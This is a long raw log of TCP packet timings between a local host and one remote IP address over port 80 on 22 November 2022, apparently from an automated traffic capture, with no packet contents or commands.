                                                                                Nov 22, 2022 05:10:19.072839975 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.072861910 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.072879076 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.072926044 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.073108912 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.073126078 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.073154926 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.073205948 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.073225021 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.073338032 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.073375940 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.073395014 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.073550940 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.073569059 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.073620081 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.073648930 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.073777914 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.073795080 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.073823929 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.074023008 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.074039936 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.074075937 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.074229002 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.074245930 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.074274063 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.074412107 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.074429989 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.074457884 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.074552059 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.074568987 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.074743032 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.074759007 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.074773073 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.076678991 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.076698065 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.076735973 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.076905012 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.076921940 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.076945066 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.081525087 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.081545115 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.081563950 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.081657887 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.081675053 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.081686974 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.081831932 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.081850052 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.081877947 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.082066059 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.082083941 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.084244013 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.224821091 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.224860907 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.224875927 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.224889040 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.224939108 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.224980116 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.225017071 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.225122929 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.225141048 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.225147963 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.225174904 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.225276947 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.225296021 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.225346088 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.225481987 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.225500107 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.225559950 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.225640059 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.225656986 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.225697994 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.225837946 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.225857973 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.225909948 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.225996971 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.226013899 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.226058006 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.226197004 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.226214886 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.226257086 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.226389885 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.226412058 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.226448059 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.226521015 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.226538897 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.226574898 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.226686001 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.226703882 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.226741076 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.226907015 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.226926088 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.226957083 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.227078915 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.227097034 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.227133036 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.227277040 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.227294922 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.227343082 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.227440119 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.227459908 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.227477074 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.227499962 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.227678061 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.227694988 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.227731943 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.227842093 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.227860928 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.228077888 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.228095055 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.228117943 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.228246927 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.228267908 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.228286028 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.228305101 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.228519917 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.228538990 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.228590012 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.228630066 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.230381012 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.230499983 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.230520010 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.230560064 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.230757952 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.230783939 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.230812073 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.235620022 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.235646009 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.235718012 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.235726118 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.235759974 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.235796928 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.235927105 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.235944986 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.235963106 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.235994101 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.236238956 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.236506939 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.238099098 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.238122940 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.238167048 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.379126072 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.379193068 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.379235983 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.379276037 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.379286051 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.379317045 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.379362106 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.379363060 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.379401922 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.379441977 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.379484892 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.379633904 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.379673958 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.379858017 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.379900932 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.379901886 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.379981041 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.380022049 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.380098104 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.380204916 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.380245924 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.380301952 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.380316973 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.380393982 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.380434990 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.380522966 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.380634069 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.380675077 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.380721092 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.380789995 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.380830050 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.380970955 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.381012917 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.381021976 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.381112099 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.381249905 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.381289005 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.381299973 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.381393909 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.381536007 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.381580114 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.381599903 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.381622076 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.381701946 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.381764889 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.381814003 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.381944895 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.381985903 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.382031918 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.382095098 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.382134914 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.382292986 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.382349968 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.382400036 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.390480995 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.390577078 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.390578032 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.390619993 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.390661001 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.390661955 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.390700102 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.390741110 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.390741110 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.390853882 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.390918016 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.390919924 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.391031981 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.391073942 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.391144037 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.391227961 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.391268969 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.391283035 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.391376972 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.391417980 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.391429901 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.391457081 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.391509056 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.391622066 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.391665936 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.391710043 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.391819954 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.392067909 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.392108917 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.392117977 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.392221928 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.392263889 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.392288923 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.533618927 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.533700943 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.533749104 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.533756971 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.533811092 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.533813953 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.533864021 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.533916950 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.533916950 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.533970118 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.534022093 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.534023046 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.534075022 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.534126997 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.534127951 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.534181118 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.534233093 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.534327030 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.534384012 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.534440994 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.534487009 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.534540892 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.534596920 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.534641027 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.534694910 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.534746885 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.534871101 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.534954071 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.535007000 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.535007954 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.535109043 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.535178900 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.535209894 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.535350084 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.535404921 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.535408974 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.535458088 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.535511017 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.535553932 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.535607100 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.535660982 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.535701990 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.535753965 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.535808086 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.535892010 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.536026955 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.536086082 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.536086082 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.536185980 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.536240101 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.536241055 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.536335945 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.536391020 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.536429882 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.536607027 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.536664963 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.536665916 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.544738054 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.544787884 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.544819117 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.544825077 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.544876099 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.544898033 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.545018911 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.545058966 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.545070887 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.545099020 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.545150995 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.545171022 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.545245886 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.545295000 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.545336962 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.545438051 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.545486927 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.545557022 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.545636892 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.545677900 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.545689106 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.545780897 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.545831919 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.545872927 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.545950890 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.545999050 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.546068907 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.546221972 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.546262026 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.546276093 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.546385050 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.546425104 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.546439886 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.688461065 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.688532114 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.688574076 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.688626051 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.688647032 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.688647032 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.688668013 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.688708067 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.688714027 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.688749075 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.688787937 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.688807964 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.688829899 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.688868999 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:19.688879013 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:19.688908100 CET8049178183.78.168.24192.168.2.22
